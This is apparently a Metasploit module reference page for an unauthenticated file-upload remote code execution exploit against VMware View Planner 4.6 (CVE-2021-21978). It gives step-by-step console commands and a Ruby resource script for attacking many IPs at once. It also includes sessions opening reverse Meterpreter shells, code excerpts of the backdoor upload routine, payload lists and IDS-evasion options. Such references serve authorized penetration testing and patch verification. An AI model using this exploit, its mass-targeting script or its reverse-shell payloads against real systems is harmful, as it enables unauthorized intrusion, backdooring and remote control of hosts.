VMware View Planner Unauthenticated Log File Upload RCE - Metasploit


This page contains detailed information about how to use the exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: VMware View Planner Unauthenticated Log File Upload RCE
Module: exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
Source code: modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb
Disclosure date: 2021-03-02
Last modification time: 2021-03-15 01:33:32 +0000
Supported architecture(s): -
Supported platform(s): Python
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-21978

This module exploits an unauthenticated log file upload within the log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 Security Patch 1. Successful exploitation will result in RCE as the apache user inside the appacheServer Docker container.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Using vmware_view_planner_4_6_uploadlog_rce against a single host

Normally, you can use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce this way:

msf > use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
msf exploit(vmware_view_planner_4_6_uploadlog_rce) > show targets
    ... a list of targets ...
msf exploit(vmware_view_planner_4_6_uploadlog_rce) > set TARGET target-id
msf exploit(vmware_view_planner_4_6_uploadlog_rce) > show options
    ... show and set options ...
msf exploit(vmware_view_planner_4_6_uploadlog_rce) > exploit

Using vmware_view_planner_4_6_uploadlog_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your vmware_view_planner_4_6_uploadlog_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


VMWare View Planner 4.6 prior to 4.6 Security Patch 1 contained an log file upload script, named log_upload_wsgi.py, which was mapped on to the web page /logupload and available to unauthenticated users. Furthermore, unauthenticated users could browse the source code of this file by navigating to /wsgi_log_upload/log_upload_wsgi.py, giving them an easy way to ensure that they restored the original contents of the log_upload_wsgi.py file.

The module takes advantage of these two properties to first obtain the contents of the log_upload_wsgi.py file and then overwrite it with a backdoored copy. Once a request has been sent to /logupload to trigger the payload, the original copy of log_upload_wsgi.py is then restored to ensure the target can continue its normal operations. Successful exploitation results in RCE as the apache user within the appacheServer Docker container.

Setup Steps

  1. Sign up for an account at https://my.vmware.com/web/vmware/registration
  2. Browse to https://my.vmware.com/web/vmware/downloads/details?downloadGroup=VIEW-PLAN-460&productId=1067&rPId=53394 and download the OVA file for View Planner Harness.
  3. Verify the name of the downloaded OVA is viewplanner-harness-4.6.0.0-16995088_OVF10.ova and its hash is 4639f1916ffd30095cf5af383f38f7de
  4. Install the VM and boot it up. When you get to the main screen, which will take several minutes, select Login with the arrow keys and log in with the username root and password changeme.
  5. Run ~/viewplanner/setup/harness_first_boot.sh to start the server.
  6. Verify that the web server is accessible over port 80 or 443 and that the page at /logupload is accessible.

Verification Steps


  1. Install the server
  2. Start msfconsole
  3. Do: use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
  4. Do: set rhosts [Target IP]
  5. Do: set lhost [Local IP]
  6. Do: exploit
  7. You should get a shell as the apache user on the target machine.
  8. You should also see that the original copy of log_upload_wsgi.py is restored after you get a shell.

Scenarios


VMWare View Planner 4.6.0.0 OVA (viewplanner-harness-4.6.0.0-16995088_OVF10.ova)

msf6 > use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > set RHOSTS 172.18.51.76
RHOSTS => 172.18.51.76
msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > set LHOST 172.18.54.135
LHOST => 172.18.54.135
msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show options

Module options (exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.18.51.76     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.54.135    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   VMware View Planner 4.6.0

msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > exploit

[*] Started reverse TCP handler on 172.18.54.135:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Vulnerable log_upload_wsgi.py file identified!
[*] Uploading backdoor to system via the arbitrary file upload vulnerability!
[+] Backdoor uploaded!
[*] Sending request to execute the backdoor!
[*] Sending stage (39344 bytes) to 172.18.51.76
[*] Reuploading the original code to remove the backdoor!
[+] Original file restored, enjoy the shell!
[*] Meterpreter session 2 opened (172.18.54.135:4444 -> 172.18.51.76:53278) at 2021-03-10 16:34:37 -0600

meterpreter > getuid
Server username: apache
meterpreter > sysinfo
Computer     : cf49e2261af4
OS           : Linux 4.9.137-1.ph2 #1-photon SMP Tue Nov 20 14:26:55 UTC 2018
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the linux/http/vmware_view_planner_4_6_uploadlog_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce

[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show info

       Name: VMware View Planner Unauthenticated Log File Upload RCE
     Module: exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
   Platform: Python
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-03-02

Provided by:
  Mikhail Klyuchnikov
  wvu <[email protected]>
  Grant Willcox

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   VMware View Planner 4.6.0

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated log file upload within the 
  log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 
  Security Patch 1. Successful exploitation will result in RCE as the 
  apache user inside the appacheServer Docker container.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-21978
  https://www.vmware.com/security/advisories/VMSA-2021-0003.html
  https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece

Module Options


This is a complete list of options available in the linux/http/vmware_view_planner_4_6_uploadlog_rce exploit:

msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show options

Module options (exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   VMware View Planner 4.6.0

Advanced Options


Here is a complete list of advanced options supported by the linux/http/vmware_view_planner_4_6_uploadlog_rce exploit:

msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show advanced

Module advanced options (exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PythonMeterpreterDebug       false            no        Enable debugging for the Python meterpreter
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/vmware_view_planner_4_6_uploadlog_rce module can exploit:

msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   VMware View Planner 4.6.0

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/vmware_view_planner_4_6_uploadlog_rce exploit:

msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show payloads

Compatible Payloads
===================

   #   Name                                         Disclosure Date  Rank    Check  Description
   -   ----                                         ---------------  ----    -----  -----------
   0   payload/generic/custom                                        normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                             normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                        normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/python/meterpreter/bind_tcp                           normal  No     Python Meterpreter, Python Bind TCP Stager
   6   payload/python/meterpreter/bind_tcp_uuid                      normal  No     Python Meterpreter, Python Bind TCP Stager with UUID Support
   7   payload/python/meterpreter/reverse_http                       normal  No     Python Meterpreter, Python Reverse HTTP Stager
   8   payload/python/meterpreter/reverse_https                      normal  No     Python Meterpreter, Python Reverse HTTPS Stager
   9   payload/python/meterpreter/reverse_tcp                        normal  No     Python Meterpreter, Python Reverse TCP Stager
   10  payload/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Meterpreter, Python Reverse TCP SSL Stager
   11  payload/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Meterpreter, Python Reverse TCP Stager with UUID Support
   12  payload/python/meterpreter_bind_tcp                           normal  No     Python Meterpreter Shell, Bind TCP Inline
   13  payload/python/meterpreter_reverse_http                       normal  No     Python Meterpreter Shell, Reverse HTTP Inline
   14  payload/python/meterpreter_reverse_https                      normal  No     Python Meterpreter Shell, Reverse HTTPS Inline
   15  payload/python/meterpreter_reverse_tcp                        normal  No     Python Meterpreter Shell, Reverse TCP Inline
   16  payload/python/shell_bind_tcp                                 normal  No     Command Shell, Bind TCP (via python)
   17  payload/python/shell_reverse_tcp                              normal  No     Command Shell, Reverse TCP (via python)
   18  payload/python/shell_reverse_tcp_ssl                          normal  No     Command Shell, Reverse TCP SSL (via python)
   19  payload/python/shell_reverse_udp                              normal  No     Command Shell, Reverse UDP (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/vmware_view_planner_4_6_uploadlog_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/vmware_view_planner_4_6_uploadlog_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target did not respond to check.


Here is a relevant code snippet related to the "Target did not respond to check." error message:

72:	      'method' => 'GET',
73:	      'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')
74:	    )
75:	
76:	    unless res
77:	      return CheckCode::Unknown('Target did not respond to check.')
78:	    end
79:	
80:	    unless res.code == 200 && !res.body.empty?
81:	      return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')
82:	    end

log_upload_wsgi.py file not found at the expected location.


Here is a relevant code snippet related to the "log_upload_wsgi.py file not found at the expected location." error message:

76:	    unless res
77:	      return CheckCode::Unknown('Target did not respond to check.')
78:	    end
79:	
80:	    unless res.code == 200 && !res.body.empty?
81:	      return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')
82:	    end
83:	
84:	    @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.
85:	
86:	    if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')

Target's log_upload_wsgi.py file has been patched.


Here is a relevant code snippet related to the "Target's log_upload_wsgi.py file has been patched." error message:

82:	    end
83:	
84:	    @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.
85:	
86:	    if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
87:	      return CheckCode::Safe("Target's log_upload_wsgi.py file has been patched.")
88:	    end
89:	
90:	    CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')
91:	  end
92:	

Vulnerable log_upload_wsgi.py file identified!


Here is a relevant code snippet related to the "Vulnerable log_upload_wsgi.py file identified!" error message:

85:	
86:	    if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
87:	      return CheckCode::Safe("Target's log_upload_wsgi.py file has been patched.")
88:	    end
89:	
90:	    CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')
91:	  end
92:	
93:	  # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.
94:	  # As the code for both is the same, minus the content of the file, this is a generic function to handle that.
95:	  def upload_file(content)

Target indicated that the file wasn't uploaded successfully!


Here is a relevant code snippet related to the "Target indicated that the file wasn't uploaded successfully!" error message:

101:	      'uri' => normalize_uri(target_uri.path, 'logupload'),
102:	      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
103:	      'data' => mime.to_s
104:	    )
105:	    unless res.to_s.include?('File uploaded successfully.')
106:	      fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded successfully!")
107:	    end
108:	  end
109:	
110:	  def exploit
111:	    # Here we want to grab our template file, taken from a clean install but

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Mikhail Klyuchnikov
  • wvu
  • Grant Willcox

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.